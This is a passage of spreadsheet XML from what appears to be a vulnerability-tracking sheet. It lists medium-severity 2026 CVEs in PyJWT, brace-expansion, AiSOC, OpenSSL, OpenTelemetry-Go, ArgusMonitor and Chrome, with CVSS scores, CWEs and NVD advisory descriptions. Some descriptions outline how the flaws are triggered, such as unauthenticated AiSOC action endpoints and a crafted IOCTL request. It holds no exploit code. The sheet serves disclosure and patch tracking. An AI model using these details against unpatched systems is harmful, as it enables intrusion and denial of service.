      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. From 2.13.0 until 2.14.0, PyJWS._load in jwt/api_jws.py is affected because parser catches ValueError but not RecursionError. This occurs when a deeply nested token header reaches json.loads. As a result, RecursionError escapes the documented PyJWT error hierarchy. Consequently, an unauthenticated malformed token can cause a request-level failure and HTTP 500. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102265</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102277</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr">
        <is>
          <t>node.js, rust</t>
        </is>
      </c>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-407</t>
        </is>
      </c>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>The brace-expansion library generates arbitrary strings containing a common prefix and suffix. Prior to 1.1.21, 2.1.7, 3.0.9, and 5.0.12, the expand function handles untrusted {a},b}-shaped patterns with many trailing closing braces by restarting its scan once for each trailing closing brace. The successive full-input rescans with linear working-string growth cause quadratic CPU time and memory pressure that can block the Node.js event loop. The process eventually recovers, making the impact a recoverable CPU denial of service. This issue is fixed in versions 1.1.21, 2.1.7, 3.0.9, and 5.0.12.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102277</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.4 → 5.3)</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103053</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr">
        <is>
          <t>docker</t>
        </is>
      </c>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions 9.0.0 before 12.0.0 fail to enforce authentication on the response-action API endpoints when AISOC_DEV_MODE is enabled and AISOC_ACTIONS_SERVICE_TOKEN is empty in the default Docker Compose deployment. Unauthenticated attackers can list response-action integrations, submit and approve actions on behalf of arbitrary principals, and dispatch containment actions using vendor credentials.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103053</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 5.3)</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103057</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>AiSOC versions 5.1.0 before 12.0.0 contain an authentication bypass vulnerability in the realtime service internal endpoints POST /internal/agent-event and POST /internal/push. Attackers can post arbitrary events with spoofed tenant identifiers to broadcast malicious content over WebSocket and Redis SSE channels or send unauthorized notifications to registered devices.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103057</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35189</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>Issue summary: A certificate with many nameRelativeToCRLIssuer CRL
distribution points causes disproportionate heap growth when OpenSSL caches
X.509 extensions.
Impact summary: Receiving a crafted certificate from a malicious peer can lead
to significant memory pressure and possible Denial of Service in clients or
in servers that solicit client certificates.
CWE: CWE-770: Allocation of Resources Without Limits or Throttling
Description: A certificate or a set of certificates that fits under the limit for
size of certificates accepted from the peer (~100 KiB) can result in allocation
of several hundred MiB of resident memory on the receiving side
during a normal TLS handshake.  This may be enough to crash the client or
server, if multiple concurrent connections lead to similarly large memory
allocations.
The fix postpones processing of the CRL distribution points extensions in
certificates to the time when the processed value is required for CRL processing.
This avoids keeping large memory allocations for a long time when such
certificates are received.
FIPS impact: no
The affected code is outside the FIPS module boundary.</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35189</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42772</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>openssl, go</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>Issue summary: The QUIC stream reassembly algorithm performance deteriorates
progressively as packets are arriving out of order. The worst case has
a quadratic complexity proportional to the number of stream frames kept in
the buffer for the received stream data.
Impact summary: A remote QUIC peer that completes the handshake can create
a connection-scoped CPU pressure and potentially a Denial of Service using
compliant STREAM frames inside the advertised receive window, with low
attacker bandwidth.
CWE: CWE-407: Inefficient Algorithmic Complexity
Description: OpenSSL manages received QUIC stream fragments using a
doubly-linked list. While it optimizes for append operations (at the end of
the list), it falls back to a head-to-tail linear search for any fragment
that does not immediately follow the current `tail`.
By manipulating the sequence of offsets, an attacker can force the server
to perform O(n^2) operations, consuming excessive CPU time for the
QUIC process.
FIPS impact: no
The FIPS module is not affected as the QUIC implementation is outside of
the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42772</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79417</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-367</t>
        </is>
      </c>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>Improper Access Control in ArgusMonitor.sys in Argotronic eGbR ArgusMonitor 7.4.02 and earlier allows local, low-privileged users to bypass device handle access restrictions via a TOCTOU condition in IRP_MJ_CREATE and send a crafted IOCTL 0x9C4024A8 request, causing denial-of-service.</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79417</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81869</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr"/>
      <c r="M363" s="5" t="inlineStr"/>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr">
        <is>
          <t>CWE-176, CWE-400</t>
        </is>
      </c>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go is the Go implementation of OpenTelemetry. From version 1.10.0 until 1.33.0, the sdk/trace/span.go attribute truncation path can fail to enforce AttributeValueLengthLimit for string and string-slice attributes containing the valid Unicode replacement character U+FFFD. safeTruncateValidUTF8 treats the valid replacement rune as invalid UTF-8 and returns the original input, while strings.ToValidUTF8 leaves that valid rune unchanged, so a second safeTruncate attempt can also return the oversized value. An attacker who controls span attribute content can retain values longer than the configured limit, increasing per-span memory use and weakening denial-of-service protection in the instrumented process. This issue is fixed in version 1.33.0.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81869</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102269</t>
        </is>
      </c>
      <c r="D364" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr"/>
      <c r="M364" s="5" t="inlineStr"/>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr">
        <is>
          <t>CWE-180</t>
        </is>
      </c>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>PyJWT is a Python implementation of JSON Web Token standards. Prior to 2.14.0, PyJWT signature segment is affected because signature segment decoding accepts characters outside the canonical Base64URL representation. This occurs when non-Base64URL characters are appended to a valid compact JWS signature segment. As a result, base64url_decode produces the same signature bytes for different serialized segments. Consequently, raw-token revocation checks can fail to recognize an equivalent modified token. This issue is fixed in version 2.14.0.</t>
        </is>
      </c>
      <c r="T364" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102269</t>
        </is>
      </c>
    </row>
    <row r="365">
      <c r="A365" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B365" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C365" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95292</t>
        </is>
      </c>
      <c r="D365" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E365" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F365" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G365" s="5" t="inlineStr"/>
      <c r="H365" s="5" t="inlineStr"/>
      <c r="I365" s="5" t="inlineStr"/>
      <c r="J365" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K365" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L365" s="5" t="inlineStr"/>
      <c r="M365" s="5" t="inlineStr"/>
      <c r="N365" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O365" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P365" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q365" s="5" t="inlineStr"/>
      <c r="R365" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S365" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Safebrowsing in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass system access restrictions via crafted network traffic. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T365" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95292</t>
        </is>
      </c>
    </row>
    <row r="366">
      <c r="A366" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B366" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C366" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95300</t>
        </is>
      </c>
      <c r="D366" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E366" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F366" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G366" s="5" t="inlineStr"/>
      <c r="H366" s="5" t="inlineStr"/>
      <c r="I366" s="5" t="inlineStr"/>
      <c r="J366" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K366" s="5" t="inlineStr"/>
      <c r="L366" s="5" t="inlineStr"/>
      <c r="M366" s="5" t="inlineStr"/>
      <c r="N366" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O366" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P366" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q366" s="5" t="inlineStr"/>
      <c r="R366" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S366" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in DevTools in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T366" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95300</t>
        </is>
      </c>
    </row>
    <row r="367">
      <c r="A367" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B367" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C367" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95358</t>
        </is>
      </c>
      <c r="D367" s="5" t="n">
        <v>4.4</v>
      </c>
      <c r="E367" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F367" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G367" s="5" t="inlineStr"/>
      <c r="H367" s="5" t="inlineStr"/>
      <c r="I367" s="5" t="inlineStr"/>
      <c r="J367" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K367" s="5" t="inlineStr"/>
      <c r="L367" s="5" t="inlineStr"/>
      <c r="M367" s="5" t="inlineStr"/>
      <c r="N367" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O367" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P367" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q367" s="5" t="inlineStr"/>
      <c r="R367" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S367" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Mobile in Google Chrome on on Android prior to 154.0.8037.57 allowed a local attacker to bypass system access restrictions into a privileged page via a co-installed app. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="T367" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95358</t>
        </is>
      </c>
    </row>
    <row r="368">
      <c r="A368" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B368" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C368" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102312</t>
        </is>
      </c>
      <c r="D368" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E368" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F368" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G368" s="5" t="inlineStr"/>
      <c r="H368" s="5" t="inlineStr"/>
      <c r="I368" s="5" t="inlineStr"/>
      <c r="J368" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K368" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="L368" s="5" t="inlineStr"/>
      <c r="M368" s="5" t="inlineStr"/>
      <c r="N368" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O368" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P368" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q368" s="5" t="inlineStr"/>
      <c r="R368" s="5" t="inlineStr">
        <is>
          <t>CWE-451</t>
        </is>
      </c>
      <c r="S368" s="5" t="inlineStr">
        <is>
          <t>UI misrepresentation in Omnibox in Google Chrome on on Android prior to 154.0.8037.92 allowed a remote attacker to spoof address bar via a crafted HTML page. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="T368" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102312</t>
        </is>
      </c>
    </row>
    <row r="369">
      <c r="A369" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B369" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C369" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95340</t>
        </is>
      </c>
      <c r="D369" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E369" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F369" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G369" s="5" t="inlineStr"/>
      <c r="H369" s="5" t="inlineStr"/>
      <c r="I369" s="5" t="inlineStr"/>
      <c r="J369" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K369" s="5" t="inlineStr"/>
      <c r="L369" s="5" t="inlineStr"/>
      <c r="M369" s="5" t="inlineStr"/>
      <c r="N369" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O369" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P369" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q369" s="5" t="inlineStr"/>
      <c r="R369" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S369" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in PictureInPicture in Google Chrome prior to 154.0.8037.57 allowed a remote attacker leveraging social engineering to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T369" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95340</t>
        </is>
      </c>
    </row>
    <row r="370">
      <c r="A370" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B370" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C370" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95342</t>
        </is>
      </c>
      <c r="D370" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E370" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F370" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G370" s="5" t="inlineStr"/>
      <c r="H370" s="5" t="inlineStr"/>
      <c r="I370" s="5" t="inlineStr"/>
      <c r="J370" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K370" s="5" t="inlineStr"/>
      <c r="L370" s="5" t="inlineStr"/>
      <c r="M370" s="5" t="inlineStr"/>
      <c r="N370" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O370" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P370" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q370" s="5" t="inlineStr"/>
      <c r="R370" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S370" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in V8 in Google Chrome prior to 154.0.8037.57 allowed a remote attacker to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="T370" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95342</t>
        </is>
      </c>
    </row>
    <row r="371">
      <c r="A371" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B371" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS added</t>
        </is>
      </c>
      <c r="C371" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95361</t>
        </is>
      </c>
      <c r="D371" s="5" t="n">
